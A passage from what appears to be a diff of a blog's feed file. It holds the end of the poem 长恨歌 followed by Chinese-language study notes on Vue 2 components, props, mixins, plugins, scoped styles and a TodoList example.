    迟迟钟鼓初长夜,耿耿星河欲曙天。

    鸳鸯瓦冷霜华重,翡翠衾寒谁与共。

    悠悠生死别经年,魂魄不曾来入梦。

    临邛道士鸿都客,能以精诚致魂魄。

    为感君王辗转思,遂教方士殷勤觅。

    排空驭气奔如电,升天入地求之遍。

    上穷碧落下黄泉,两处茫茫皆不见。

    忽闻海上有仙山,山在虚无缥渺间。

    楼阁玲珑五云起,其中绰约多仙子。

    中有一人字太真,雪肤花貌参差是。

    金阙西厢叩玉扃,转教小玉报双成。

    闻道汉家天子使,九华帐里梦魂惊。

    揽衣推枕起徘徊,珠箔银屏迤逦开。

    云鬓半偏新睡觉,花冠不整下堂来。

    风吹仙袂飘飘举,犹似霓裳羽衣舞。

    玉容寂寞泪阑干,梨花一枝春带雨。

    含情凝睇谢君王,一别音容两渺茫。

    昭阳殿里恩爱绝,蓬莱宫中日月长。

    回头下望人寰处,不见长安见尘雾。

    惟将旧物表深情,钿合金钗寄将去。

    钗留一股合一扇,钗擘黄金合分钿。

    但教心似金钿坚,天上人间会相见。

    临别殷勤重寄词,词中有誓两心知。

    七月七日长生殿,夜半无人私语时。

    在天愿作比翼鸟,在地愿为连理枝。

    天长地久有时尽,此恨绵绵无绝期。

    长恨歌

    ]]>
    @@ -85,7 +85,7 @@ /posts/Web-Vue%EF%BC%88Vue%20%E7%BB%84%E4%BB%B6%E5%8C%96%E7%BC%96%E7%A8%8B%20&%20%E8%84%9A%E6%89%8B%E6%9E%B6%EF%BC%89/ - 资源

    正文

    一、模块与组件、模块化与组件化

    053 对组件的理解

    webp

    webp

    webp

    模块

    1. 理解:向外提供特定功能的 js 程序,一般就是一个 js 文件
    2. 为什么:js 文件很多很复杂
    3. 作用:复用 js,简化 js 的编写,提高 js 运行效率

    组件

    1. 理解:用来实现局部(特定)功能效果的代码集合 (html/css/js/image…)

    2. 为什么:一个界面的功能很复杂

    3. 作用:复用编码,简化项目编码,提高运行效率

    模块化

    ​当应用中的 js 都以模块来编写的,那这个应用就是一个模块化的应用。

    组件化

    ​当应用中的功能都是多组件的方式来编写的,那这个应用就是一个组件化的应用。

    二、非单文件组件

    054 非单文件组件

    Vue 中使用组件的三大步骤:

    • 定义组件(创建组件)

    • 注册组件

    • 使用组件(写组件标签)

    一、如何定义一个组件?

    ​使用 vue.extend(options) 创建,其中 optionsnew vue(options) 时传入的那个 options 几乎一样,但也有点区别:

    ​区别如下:

    • el 不要写,为什么?
      • 最终所有的组件都要经过一个 vm 的管理,由 vm 中的 el 决定服务哪个容器。
    • data 必须写成函数,为什么?
      • 避免组件被复用时,数据存在引用关系。
    • 备注:使用 template 可以配置组件结构。

    二、如何注册组件?

    • 局部注册:靠 new Vue 的时候传入 components 选项
    • 全局注册:Vue.component('组件名', 组件)

    三、编写组件标签:

    • <school></school>
    <div id="root">
    <hello></hello>
    <hr>
    <h1>{{msg}}</h1>
    <school></school>
    <hr>
    <student></student>
    </div>
    <div id="root2">
    <hello></hello>
    </div>
    <script type="text/javascript">
    Vue.config.productionTip = false // 阻止 Vue 在启动时生成生产提示。
    // 创建组件
    const school = Vue.extend({
    template: `<div><h1>学校名称:{{name}}</h1><h1>学校地址:{{address}}</h1></div>`,
    data() {
    return {
    name: 'FJNU',
    address: 'Fuzhou'
    }
    }
    })

    const student = Vue.extend({
    template: `<div><h1>学生名称:{{name}}</h1><h1>学生年龄:{{age}}</h1></div>`,
    data() {
    return {
    name: '古尔丹',
    age: 16
    }
    }
    })

    const hello = Vue.extend({
    template: `<h1>你好,旅行者。</h1>`
    })

    Vue.component('hello', hello) // 全局注册
    // 创建 Vue 实例
    const vm = new Vue({
    el: '#root',
    data: {
    msg: '你好啊朋友!'
    },
    components: {
    school, // 相当于 school: school
    student
    }
    })
    </script>

    055 组件的几个注意点

    几个注意点:

    1. 关于组件名:

      • 一个单词组成:

        第一种写法(首字母小写):school

        第二种写法(首字母大写):School

      • 多个单词组成:

        第一种写法(kebab-case 命名):my-school

        第二种写法(CamelCase 命名):MySchool(需要 Vue 脚手架支持)

      • 备注

        • 组件名尽可能回避 HTML 中已有的元素名称,例如:h2H2 都不行。
        • 可以使用 name 配置项指定组件在开发者工具中呈现的名字。
    2. 关于组件标签:
      第一种写法:<school></school>

      第二种写法:<school/>

      备注:不用使用脚手架时,<school/> 会导致后续组件不能染

    3. 一个简写方式:
      const school = Vue.extend(options) 可简写为:const school = options

    056 组件的嵌套

    ​建立如下的组件结构:

    classDiagram    class Student {        +String name        +int age        +data()    }    class School {        +String name        +String address        +data()        +components: Student    }    class Hello {        +String template    }    class App {        +String template        +components: Hello, School    }    class VueInstance {        +components: App    }    Student --> School : nested    School --> App : used in    Hello --> App : used in    App --> VueInstance : root component
    <div id="root"></div>

    <script type="text/javascript">
    Vue.config.productionTip = false // 阻止 Vue 在启动时生成生产提示。
    // 创建组件
    const student = Vue.extend({
    template: `<div><h1>学生名称:{{name}}</h1><h1>学生年龄:{{age}}</h1></div>`,
    data() {
    return {
    name: '古尔丹',
    age: 16
    }
    },
    })

    const school = Vue.extend({
    template: `<div>
    <h1>学校名称:{{name}}</h1>
    <h1>学校地址:{{address}}</h1>
    <student></student>
    </div>`,
    data() {
    return {
    name: 'FJNU',
    address: 'Fuzhou'
    }
    },
    components: {
    student
    }
    })

    const hello = Vue.extend({
    template: `<h1>你好,旅行者。</h1>`
    })

    const app = Vue.extend({
    template: `<div><hello/><school/></div>`,
    components: {
    school,
    hello
    }
    })

    // 创建 Vue 实例
    const vm = new Vue({
    el: '#root',
    template: `<app/>`,
    components: {
    app,
    }
    })
    </script>

    057 VueComponent 构造函数 & 058 Vue 实例与组件实例

    关于 VueComponent

    1. school 组件本质是一个名为 Vuecomponent 的构造函数,且不是程序员定义的,是 Vue.extend 生成的。

    2. 我们只需要写 <school/><school></school>,Vue 解析时会帮我们创建 school 组件的实例对象,即 Vue 帮我们执行的:newVueComponent(options)

    3. 特别注意:每次调用 Vue.extend,返回的都是一个全新的 Vuecomponent!!!

    4. 关于 this 指向:

      • 组件配置中:
        data 函数、methods 中的函数、watch 中的函数、computed 中的函数 它们的 this 均是 Vuecomponent 实例对象
      • new Vue(options) 配置中:
        data 函数、methods 中的函数、watch 中的函数、computed 中的函数 它们的 this 均是 Vue 实例对象
    5. VueComponent 的实例对象,以后简称 vc(也可称之为:组件实例对象)。

      Vue 的实例对象,以后简称 vm

    059 一个重要的内置关系

    ​在 JavaScript 中,"显示原型属性"和"隐式原型属性"是两个不同的概念,涉及到对象的继承和原型链的机制。为了更好地理解这些概念,我们需要先了解原型链以及如何通过原型来实现继承。

    1. 隐式原型属性(__proto__

    定义:

    ​隐式原型属性指的是每个 JavaScript 对象内部都有一个隐式的 __proto__ 属性。它指向对象的构造函数的原型对象(即该对象的父类)。

    特点:
    • __proto__ 不是显式声明的,而是 JavaScript 引擎自动添加到每个对象内部的一个隐藏属性。
    • __proto__ 连接对象与其构造函数的原型对象,是实现原型链继承的基础。
    • 每个对象都有自己的原型对象,原型对象又有自己的原型,形成原型链。当访问对象的属性或方法时,JavaScript 会沿着原型链查找。
    示例:
    javascriptCopy Codefunction Person(name) {
    this.name = name;
    }

    Person.prototype.sayHello = function() {
    console.log('Hello, ' + this.name);
    };

    const p1 = new Person('John');
    console.log(p1.__proto__ === Person.prototype); // true

    ​在上面的代码中,p1.__proto__Person.prototype,即 p1 对象的原型。

    2. 显示原型属性(prototype

    定义:

    ​显示原型属性是指构造函数(类)的 prototype 属性。每个函数对象都有一个 prototype 属性,这个属性指向构造函数的原型对象。通过 prototype 属性可以定义构造函数实例共享的属性和方法。

    特点:
    • 构造函数的 prototype 属性用于定义所有实例对象共享的方法或属性。
    • 当你通过构造函数创建实例时,实例对象会通过 __proto__ 指向构造函数的 prototype
    示例:
    javascriptCopy Codefunction Person(name) {
    this.name = name;
    }

    Person.prototype.sayHello = function() {
    console.log('Hello, ' + this.name);
    };

    const p1 = new Person('John');
    const p2 = new Person('Jane');
    p1.sayHello(); // "Hello, John"
    p2.sayHello(); // "Hello, Jane"

    ​在这个例子中,Person.prototypePerson 函数的原型对象,sayHello 方法定义在该原型对象上,p1p2 实例通过 __proto__ 访问到 Person.prototype,从而能够共享该方法。

    总结

    • 隐式原型属性(__proto__:是每个对象自动拥有的属性,指向该对象的构造函数的原型。
    • 显示原型属性(prototype:是每个构造函数自动拥有的属性,指向一个对象,这个对象包含了所有通过该构造函数创建的实例共享的属性和方法。

    ​通过这两种原型属性,JavaScript 实现了基于原型链的继承机制。

    webp

    三、单文件组件

    060 单文件组件 & 061 创建 Vue 脚手架 & 062 分析脚手架结构

    ​Vue 脚手架是 Vue 官方提供的标准化开发工具(开发平台)。

    ​安装:

    npm install -g @vue/cli

    ​创建一个项目(选择 Vue2):

    vue create vue_test

    ​启动服务器:

    cd vue_test
    npm run serve

    webp

    Babel 是一个广泛使用的 JavaScript 编译器,主要用于将现代 JavaScript(ES6+)代码转换为向后兼容的版本,以便可以在旧版本的浏览器或环境中运行。它支持的主要功能包括:

    1. 语法转换:将新版本的 JavaScript 语法(如箭头函数、模块化等)转换为旧版兼容的语法。
    2. Polyfills:通过插件(如 @babel/preset-envcore-js),可以添加对新 API(如 PromiseArray.prototype.includes 等)的支持。
    3. TypeScript 支持:Babel 可以处理 TypeScript 代码,将其编译为纯 JavaScript。
    4. React 支持:通过 @babel/preset-react,Babel 可以编译 JSX 语法。
    5. 自定义插件:支持通过编写插件来扩展 Babel 的功能。

    Babel 通常用于构建工具(如 Webpack、Rollup)中,配合其他工具实现现代开发。

    ESLint 是一个 JavaScript 的静态代码分析工具,用于查找代码中的问题,并帮助开发者遵循一致的代码风格。它的主要特点包括:

    1. 发现问题:可以发现语法错误、潜在问题(如未定义的变量)以及最佳实践建议。
    2. 代码风格:支持检查代码格式(如缩进、引号、分号等),并强制团队遵守一致的代码风格。
    3. 可定制规则:通过配置文件(如 .eslintrc),开发者可以启用或禁用特定规则。
    4. 插件扩展:支持社区插件(如 React、Vue 等插件)来检查特定框架的代码。
    5. 自动修复:ESLint 可以自动修复一些简单的代码问题,例如格式不一致。
    6. 与编辑器集成:通过插件,可以在编辑器(如 VS Code)中实时查看代码问题。

    ESLint 通常与 Babel 或 TypeScript 配合使用,在开发和 CI/CD 流程中确保代码质量。

    特性BabelESLint
    用途转换代码以支持旧环境分析代码并强制执行一致性和质量
    目标编译现代 JavaScript 到兼容版本发现潜在错误和代码风格问题
    执行时机构建时开发时或代码审查阶段
    扩展性插件和预设支持复杂的语法转换插件支持多种框架和编码风格检查

    总结

    • Babel 是工具链中的“编译器”,确保代码能在目标环境运行。
    • ESLint 是工具链中的“检查员”,确保代码高质量并易于维护。

    ​VSCode 中按下 Ctrl + ` 键可以打开终端。

    ​调整项目的文件结构:

    • vue_test
      • node_modules
      • public
        • favicon.ico
        • index.html
      • src
        • assets
          • logo.png
        • components
          • School.vue
          • Student.vue
        • App.vue
        • main.js

    ​修改文件中的内容:

    <!DOCTYPE html>
    <html lang="">
    <head>
    <meta charset="utf-8">
    <!-- 针对 IE 浏览器的一个特殊配置,含义是让 IE 浏览器以最高的渲染级别渲染页面 -->
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <!-- 开启移动端的理想视口 -->
    <meta name="viewport" content="width=device-width,initial-scale=1.0">
    <!-- 配置页签图标 -->
    <link rel="icon" href="<%= BASE_URL %>favicon.ico">
    <!-- 配置网页标题 -->
    <title><%= htmlWebpackPlugin.options.title %></title>
    </head>
    <body>
    <!-- 当浏览器不支持 js 时,noscript 中的元素就会被渲染 -->
    <noscript>
    <strong>We're sorry but <%= htmlWebpackPlugin.options.title %> doesn't work properly without JavaScript enabled. Please enable it to continue.</strong>
    </noscript>
    <!-- 容器 -->
    <div id="app"></div>
    <!-- built files will be auto injected -->
    </body>
    </html>
    <template>
    <div class="demo">
    <h2>学校名称:{{name}}</h2>
    <h2>学校地址:{{address}}</h2>
    <button @click="showName">点我提示学校名</button>
    </div>
    </template>

    <script>
    /* eslint-disable vue/multi-word-component-names */
    export default {
    name: 'School',
    data() {
    return {
    name: 'FJNU',
    address: 'Fuzhou'
    }
    },
    methods: {
    showName() {
    alert(this.name)
    }
    }
    }
    </script>

    <style>
    .demo {
    background-color: orange;
    }
    </style>
    <template>
    <div>
    <h2>学生姓名:{{name}}</h2>
    <h2>学生年龄:{{age}}</h2>
    </div>
    </template>

    <script>
    /* eslint-disable vue/multi-word-component-names */
    export default {
    name: 'Student',
    data() {
    return {
    name: '张三',
    age: 18
    }
    }
    }
    </script>
    <template>
    <div>
    <img src="./assets/logo.png" alt="logo">
    <School></School>
    <Student></Student>
    </div>
    </template>

    <script>
    import School from './components/School.vue';
    import Student from './components/Student.vue';

    export default {
    name: 'App',
    components: {
    School,
    Student
    }
    }
    </script>
    // 该文件是整个项目的入口文件

    // 引入 Vue
    import Vue from 'vue'
    // 引入 App 组件,它是所有组件的父组件
    import App from './App.vue'
    // 关闭 Vue 的生产提示
    Vue.config.productionTip = false

    // 创建 Vue 实例对象 vm
    new Vue({
    el: '#app',
    render: h => h(App),
    })

    ​执行下列语句编译:

    npm run serve

    webp

    063 render 函数

    ​为什么 main.js 里要用:

    // 创建 Vue 实例对象 vm
    new Vue({
    el: '#app',
    render: h => h(App),
    })

    ​而不是:

    new Vue({
    el: '#app',
    template: `<app></app>`
    })

    ​?这是因为 main.js 中引用的不是完整版的 Vue。

    关于不同版本的 Vue:

    1. vue.jsvue.runtime.xxx.js 的区别:
      • vue.js 是完整版的 Vue,包含:核心功能 + 模板解析器。
      • vue.runtime.xxx.js 是运行版的 Vue,只包含:核心功能;没有模板解析器。
    2. 因为 vue.runtime.xxx.js 没有模板解析器,所以不能使用 template 配置项,需要使用 render 函数接收到的 createElement 函数去指定具体内容。

    064 修改默认配置

    下列命令输出配置文件:
    vue inspect > output.js

    ​也可通过 vue.config.js 来修改默认配置:

    module.exports = {
    pages: {
    index: {
    // 入口
    entry: 'erc/XXX.js'
    }
    }
    }

    065 ref 属性

    1. 被用来给元素或子组件注册引用信息(id 的替代者)

    2. 应用在 html 标签上获取的是真实 DOM 元素,应用在组件标签上是组件实例对象(vc)

    3. 使用方式:

      打标识:<h1 ref="xxx">.....</h1><School ref="xxx"></School>

      获取:this.$refs.xxx

    webp

    <template>
    <div>
    <h1 v-text="msg" ref="title"></h1>
    <button ref="btn" @click="showDOM">点我输出信息</button>
    <School ref="sch"/>
    </div>
    </template>

    <script>
    // 引入 School 组件
    import School from './components/School.vue';

    export default {
    name: 'App',
    components: {School},
    data() {
    return {
    msg: '你好啊朋友!'
    }
    },
    methods: {
    showDOM() {
    console.log(this.$refs.title)
    console.log(this.$refs.btn)
    console.log(this.$refs.sch)
    }
    },
    }
    </script>

    066 props 配置

    ​配置项 props

    ​功能:让组件接收外部传过来的数据

    1. 传递数据:

      <Demo name="xxx"/>
    2. 接收数据:

      第一种方式(只接收):

      props:['name']

      第二种方式(限制类型):

      props: {name: Number}

      第三种方式(限制类型、限制必要性、指定默认值):

      props: {
      name: {
      type: String, // 类型
      required: true, // 必要性
      default: '老王' // 默认值
      }
      }

    ​备注:props 是只读的,Vue 底层会监测你对 props 的修改,如果进行了修改,就会发出警告,若业务需求确实需要修改,那么请复制 props 的内容到 data 中一份,然后去修改 data 中的数据。

    <template>
    <div>
    <Student name="吉安娜" sex="女" :age="18"></Student>
    <hr>
    <Student name="古尔丹" sex="女" :age="30"></Student>
    </div>
    </template>

    <script>
    import Student from './components/Student.vue'

    export default {
    name: 'App',
    components: {
    Student
    }
    }
    </script>
    <template>
    <div>
    <h1>{{ msg }}</h1>
    <h2>学生姓名:{{ name }}</h2>
    <h2>学生性别:{{ sex }}</h2>
    <h2>学生年龄:{{ age }}</h2>
    </div>
    </template>

    <script>
    /* eslint-disable vue/multi-word-component-names */
    export default {
    name: 'Student',
    data() {
    console.log(this)
    return {
    msg: '你好,旅行者。'
    }
    },
    props: ['name', 'age', 'sex']
    }
    </script>

    067 mixin 混入

    ​如果多个 Vue 组件要共用一个属性,可以使用 mixin 混入,将共用的部分用一个 js 文件存储。

    export const hunhe = {
    methods: {
    showName() {
    alert(this.name)
    }
    },
    mounted() {
    console.log('嗬,你好!')
    }
    }

    局部混入

    ​下面使用在 Student.vueSchool.vue 文件下混入。

    <template>
    <div>
    <Student></Student>
    <hr>
    <School></School>
    </div>
    </template>

    <script>
    import Student from './components/Student.vue'
    import School from './components/School.vue'

    export default {
    name: 'App',
    components: {
    Student,
    School
    }
    }
    </script>
    <template>
    <div>
    <h2 @click="showName">学生名称:{{name}}</h2>
    <h2>学生性别:{{sex}}</h2>
    </div>
    </template>

    <script>
    import {hunhe} from '../mixin.js'
    /* eslint-disable vue/multi-word-component-names */
    export default {
    name: 'Student',
    data() {
    return {
    name: '古尔丹',
    sex: 'Male'
    }
    },
    mixins: [hunhe]
    }
    </script>
    <template>
    <div>
    <h2 @click="showName">学校名称:{{name}}</h2>
    <h2>学校地址:{{address}}</h2>
    </div>
    </template>

    <script>
    import {hunhe} from '../mixin.js'
    /* eslint-disable vue/multi-word-component-names */
    export default {
    name: 'Student',
    data() {
    return {
    name: 'FJNU',
    address: 'Fuzhou'
    }
    },
    mixins: [hunhe]
    }
    </script>

    全局混入

    ​下面使用在 main.js 文件下混入。

    import Vue from 'vue'
    import App from './App.vue'
    import { hunhe } from './mixin'

    Vue.config.productionTip = false
    Vue.mixin(hunhe)

    new Vue({
    render: h => h(App),
    }).$mount('#app')
    <template>
    <div>
    <h2 @click="showName">学生名称:{{name}}</h2>
    <h2>学生性别:{{sex}}</h2>
    </div>
    </template>

    <script>
    /* eslint-disable vue/multi-word-component-names */
    export default {
    name: 'Student',
    data() {
    return {
    name: '古尔丹',
    sex: 'Male'
    }
    },
    mixins: [hunhe]
    }
    </script>
    <template>
    <div>
    <h2 @click="showName">学校名称:{{name}}</h2>
    <h2>学校地址:{{address}}</h2>
    </div>
    </template>

    <script>
    /* eslint-disable vue/multi-word-component-names */
    export default {
    name: 'Student',
    data() {
    return {
    name: 'FJNU',
    address: 'Fuzhou'
    }
    },
    mixins: [hunhe]
    }
    </script>

    068 插件

    ​功能:用于增强 Vue。

    ​本质:包含 install 方法的一个对象,install 的第一个参数是 Vue,第二个以后的参数是插件使用者传递的数据。

    ​定义插件:

    对象.install = function(Vue, options) {
    // 1.添加全局过滤器(这在 Vue3 中被弃用)
    Vue.filter(....)
    // 2.添加全局指令
    Vue.directive(....)
    // 3.配置全局混入(合)
    Vue.mixin(....)
    // 4.添加实例方法
    Vue.prototype.$myMethod = function(){...}
    Vue.prototype.$myProperty = xxxx
    }

    ​使用插件:Vue.use()

    // 引入 Vue
    import Vue from 'vue'
    // 引入 App
    import App from './App.vue'
    // 引入插件
    import plugins from './plugins'
    // 关闭 Vue 的生产提示
    Vue.config.productionTip = false

    // 应用(使用)插件
    Vue.use(plugins, 1, 2, 3)
    // 创建 vm
    new Vue({
    el: '#app',
    render: h => h(App)
    })
    export default {
    install(Vue, x, y, z) {
    console.log(x, y, z)
    // 全局过滤器
    Vue.filter('mySlice', function (value) {
    return value.slice(0, 4)
    })

    // 定义全局指令
    Vue.directive('fbind', {
    // 指令与元素成功绑定时(一上来)
    bind(element, binding) {
    element.value = binding.value
    },
    // 指令所在元素被插入页面时
    inserted(element) {
    element.focus()
    },
    // 指令所在的模板被重新解析时
    update(element, binding) {
    element.value = binding.value
    }
    })

    // 定义混入
    Vue.mixin({
    data() {
    return {
    x: 100,
    y: 200
    }
    },
    })

    // 给 Vue 原型上添加一个方法(vm 和 vc 就都能用了)
    Vue.prototype.hello = () => { alert('你好啊') }
    }
    }
    <template>
    <div>
    <h2>学校名称:{{ name | mySlice }}</h2>
    <h2>学校地址:{{ address }}</h2>
    <button @click="test">点我测试一个hello方法</button>
    </div>
    </template>

    <script>
    /* eslint-disable vue/multi-word-component-names */
    export default {
    name: 'School',
    data() {
    return {
    name: '尚硅谷atguigu',
    address: '北京',
    }
    },
    methods: {
    test() {
    this.hello()
    }
    },
    }
    </script>
    <template>
    <div>
    <h2>学生姓名:{{ name }}</h2>
    <h2>学生性别:{{ sex }}</h2>
    <input type="text" v-fbind:value="name">
    </div>
    </template>

    <script>
    /* eslint-disable vue/multi-word-component-names */
    export default {
    name: 'Student',
    data() {
    return {
    name: '张三',
    sex: '男'
    }
    },
    }
    </script>

    webp

    069 scoped 样式

    <style lang="less" scoped> 可以设定样式语言为 css,scoped 可以设定样式作用范围在文件内。

    // 引入 Vue
    import Vue from 'vue'
    // 引入 App
    import App from './App.vue'
    // 关闭 Vue 的生产提示
    Vue.config.productionTip = false

    // 创建 vm
    new Vue({
    el: '#app',
    render: h => h(App)
    })
    <template>
    <div class="demo">
    <h2 class="school">学校名称:{{ name }}</h2>
    <h2>学校地址:{{ address }}</h2>
    </div>
    </template>

    <script>
    /* eslint-disable vue/multi-word-component-names */
    export default {
    name: 'School',
    data() {
    return {
    name: '河百带学',
    address: '河北保定',
    }
    },
    }
    </script>

    <style lang="less" scoped>
    .demo {
    background-color: orange;
    .school {
    font-size: larger;
    }
    }
    </style>
    <template>
    <div class="demo">
    <h2>学生姓名:{{ name }}</h2>
    <h2>学生性别:{{ sex }}</h2>
    </div>
    </template>

    <script>
    /* eslint-disable vue/multi-word-component-names */
    export default {
    name: 'Student',
    data() {
    return {
    name: '张三',
    sex: '男'
    }
    },
    }
    </script>

    <style lang="less" scoped>
    .demo {
    background-color: skyblue;
    }
    </style>

    070-077 TodoList 案例

    1. 组件化编码流程

      • 拆分静态组件:组件要按照功能点拆分,命名不要与 html 元素冲突

      • 实现动态组件:考虑好数据的存放位置,数据是一个组件在用,还是一些组件在用:

        • 一个组件在用:放在组件自身即可。
        • 一些组件在用:放在他们共同的父组件上(状态提升
        • 实现交互:从绑定事件开始。
    2. props 适用于:

      • 父组件 ==> 子组件 通信
      • 子组件 ==> 父组件 通信(要求父先给子一个函数)
      • 使用 v-model 时要切记:v-model 绑定的值不能是 props 传过来的值,因为 props 是不可以修改的!
      • props 传过来的若是对象类型的值,修改对象中的属性时 Vue 不会报错,但不推荐这样做。

    webp

    • 父组件组织整个 TodoList 的结构。将所有数据存在 data() 中的 todos 中。
    • 处理 todos 的相关函数也在整个父组件中。
    <template>
    <div id="root">
    <div class="todo-container">
    <div class="todo-wrap">
    <MyHeader :addTodo="addTodo" />
    <MyList :todos="todos" :checkTodo="checkTodo" :deleteTodo="deleteTodo" />
    <MyFooter :todos="todos" :checkAllTodo="checkAllTodo" :clearAllTodo="clearAllTodo" />
    </div>
    </div>
    </div>
    </template>

    <script>
    import MyHeader from './components/MyHeader'
    import MyList from './components/MyList'
    import MyFooter from './components/MyFooter.vue'

    export default {
    name: 'App',
    components: { MyHeader, MyList, MyFooter },
    data() {
    return {
    // 由于 todos 是 MyHeader 组件和 MyFooter 组件都在使用,所以放在 App 中(状态提升)
    todos: [
    { id: '001', title: '抽烟', done: true },
    { id: '002', title: '喝酒', done: false },
    { id: '003', title: '开车', done: true }
    ]
    }
    },
    methods: {
    // 添加一个 todo
    addTodo(todoObj) {
    this.todos.unshift(todoObj)
    },
    // 勾选 or 取消勾选一个 todo
    checkTodo(id) {
    this.todos.forEach((todo) => {
    if (todo.id === id) todo.done = !todo.done
    })
    },
    // 删除一个 todo
    deleteTodo(id) {
    this.todos = this.todos.filter(todo => todo.id !== id)
    },
    // 全选 or 取消全选
    checkAllTodo(done) {
    this.todos.forEach((todo) => {
    todo.done = done
    })
    },
    // 清除所有已经完成的 todo
    clearAllTodo() {
    this.todos = this.todos.filter((todo) => {
    return !todo.done
    })
    }
    }
    }
    </script>

    <style>
    /*base*/
    body {
    background: #fff;
    }

    .btn {
    display: inline-block;
    padding: 4px 12px;
    margin-bottom: 0;
    font-size: 14px;
    line-height: 20px;
    text-align: center;
    vertical-align: middle;
    cursor: pointer;
    box-shadow: inset 0 1px 0 rgba(255, 255, 255, 0.2), 0 1px 2px rgba(0, 0, 0, 0.05);
    border-radius: 4px;
    }

    .btn-danger {
    color: #fff;
    background-color: #da4f49;
    border: 1px solid #bd362f;
    }

    .btn-danger:hover {
    color: #fff;
    background-color: #bd362f;
    }

    .btn:focus {
    outline: none;
    }

    .todo-container {
    width: 600px;
    margin: 0 auto;
    }

    .todo-container .todo-wrap {
    padding: 10px;
    border: 1px solid #ddd;
    border-radius: 5px;
    }
    </style>
    • 使用 v-for 创建若干 todoObj,使得列表中有多个表项。

    • 使用 props 接收 App 传递过来的数据,实现组件之间的数据传递。

    <template>
    <ul class="todo-main">
    <MyItem v-for="todoObj in todos" :key="todoObj.id" :todo="todoObj" :checkTodo="checkTodo"
    :deleteTodo="deleteTodo" />
    </ul>
    </template>

    <script>
    import MyItem from './MyItem'

    export default {
    name: 'MyList',
    components: { MyItem },
    // 声明接收 App 传递过来的数据,其中 todos 是自己用的,checkTodo 和 deleteTodo 是给子组件 MyItem 用的
    props: ['todos', 'checkTodo', 'deleteTodo']
    }
    </script>

    <style scoped>
    /*main*/
    .todo-main {
    margin-left: 0px;
    border: 1px solid #ddd;
    border-radius: 2px;
    padding: 0px;
    }

    .todo-empty {
    height: 40px;
    line-height: 40px;
    border: 1px solid #ddd;
    border-radius: 2px;
    padding-left: 5px;
    margin-top: 10px;
    }
    </style>
    <template>
    <li>
    <label>
    <input type="checkbox" :checked="todo.done" @change="handleCheck(todo.id)"/>
    <!-- 如下代码也能实现功能,但是不太推荐,因为有点违反原则,因为修改了 props -->
    <!-- <input type="checkbox" v-model="todo.done"/> -->
    <span>{{todo.title}}</span>
    </label>
    <button class="btn btn-danger" @click="handleDelete(todo.id)">删除</button>
    </li>
    </template>

    <script>
    export default {
    name:'MyItem',
    // 声明接收 todo、checkTodo、deleteTodo
    props:['todo','checkTodo','deleteTodo'],
    methods: {
    // 勾选 or 取消勾选
    handleCheck(id){
    //通知 App 组件将对应的 todo 对象的 done 值取反
    this.checkTodo(id)
    },
    // 删除
    handleDelete(id){
    if(confirm('确定删除吗?')){
    // 通知 App 组件将对应的 todo 对象删除
    this.deleteTodo(id)
    }
    }
    },
    }
    </script>

    <style scoped>
    /*item*/
    li {
    list-style: none;
    height: 36px;
    line-height: 36px;
    padding: 0 5px;
    border-bottom: 1px solid #ddd;
    }

    li label {
    float: left;
    cursor: pointer;
    }

    li label li input {
    vertical-align: middle;
    margin-right: 6px;
    position: relative;
    top: -1px;
    }

    li button {
    float: right;
    display: none;
    margin-top: 3px;
    }

    li:before {
    content: initial;
    }

    li:last-child {
    border-bottom: none;
    }

    li:hover{
    background-color: #ddd;
    }

    li:hover button{
    display: block;
    }
    </style>
    <template>
    <div class="todo-header">
    <input type="text" placeholder="请输入你的任务名称,按回车键确认" v-model="title" @keyup.enter="add" />
    </div>
    </template>

    <script>
    import { nanoid } from 'nanoid'
    export default {
    name: 'MyHeader',
    // 接收从 App 传递过来的 addTodo
    props: ['addTodo'],
    data() {
    return {
    // 收集用户输入的 title
    title: ''
    }
    },
    methods: {
    add() {
    // 校验数据
    if (!this.title.trim()) return alert('输入不能为空')
    // 将用户的输入包装成一个 todo 对象
    const todoObj = { id: nanoid(), title: this.title, done: false }
    // 通知 App 组件去添加一个 todo 对象
    this.addTodo(todoObj)
    // 清空输入
    this.title = ''
    }
    },
    }
    </script>

    <style scoped>
    /*header*/
    .todo-header input {
    width: 560px;
    height: 28px;
    font-size: 14px;
    border: 1px solid #ccc;
    border-radius: 4px;
    padding: 4px 7px;
    }

    .todo-header input:focus {
    outline: none;
    border-color: rgba(82, 168, 236, 0.8);
    box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075), 0 0 8px rgba(82, 168, 236, 0.6);
    }
    </style>
    <template>
    <div class="todo-footer" v-show="total">
    <label>
    <!-- <input type="checkbox" :checked="isAll" @change="checkAll"/> -->
    <input type="checkbox" v-model="isAll"/>
    </label>
    <span>
    <span>已完成{{doneTotal}}</span> / 全部{{total}}
    </span>
    <button class="btn btn-danger" @click="clearAll">清除已完成任务</button>
    </div>
    </template>

    <script>
    export default {
    name:'MyFooter',
    props:['todos','checkAllTodo','clearAllTodo'],
    computed: {
    //总数
    total(){
    return this.todos.length
    },
    //已完成数
    doneTotal(){
    //此处使用reduce方法做条件统计
    /* const x = this.todos.reduce((pre,current)=>{
    console.log('@',pre,current)
    return pre + (current.done ? 1 : 0)
    },0) */
    //简写
    return this.todos.reduce((pre,todo)=> pre + (todo.done ? 1 : 0) ,0)
    },
    //控制全选框
    isAll:{
    //全选框是否勾选
    get(){
    return this.doneTotal === this.total && this.total > 0
    },
    //isAll被修改时set被调用
    set(value){
    this.checkAllTodo(value)
    }
    }
    },
    methods: {
    /* checkAll(e){
    this.checkAllTodo(e.target.checked)
    } */
    //清空所有已完成
    clearAll(){
    this.clearAllTodo()
    }
    },
    }
    </script>

    <style scoped>
    /*footer*/
    .todo-footer {
    height: 40px;
    line-height: 40px;
    padding-left: 6px;
    margin-top: 5px;
    }

    .todo-footer label {
    display: inline-block;
    margin-right: 20px;
    cursor: pointer;
    }

    .todo-footer label input {
    position: relative;
    top: -1px;
    vertical-align: middle;
    margin-right: 5px;
    }

    .todo-footer button {
    float: right;
    margin-top: 5px;
    }
    </style>
    graph TD  A[App.vue]  B[MyHeader.vue]  C[MyFooter.vue]  D[MyList.vue]  E[MyItem.vue]  A -->|addTodo| B  A -->|todos, checkAllTodo, clearAllTodo| C  A -->|todos, checkTodo, deleteTodo| D  D -->|todo, checkTodo, deleteTodo| E
    ]]>
    + 资源

    正文

    一、模块与组件、模块化与组件化

    053 对组件的理解

    webp

    webp

    webp

    模块

    1. 理解:向外提供特定功能的 js 程序,一般就是一个 js 文件
    2. 为什么:js 文件很多很复杂
    3. 作用:复用 js,简化 js 的编写,提高 js 运行效率

    组件

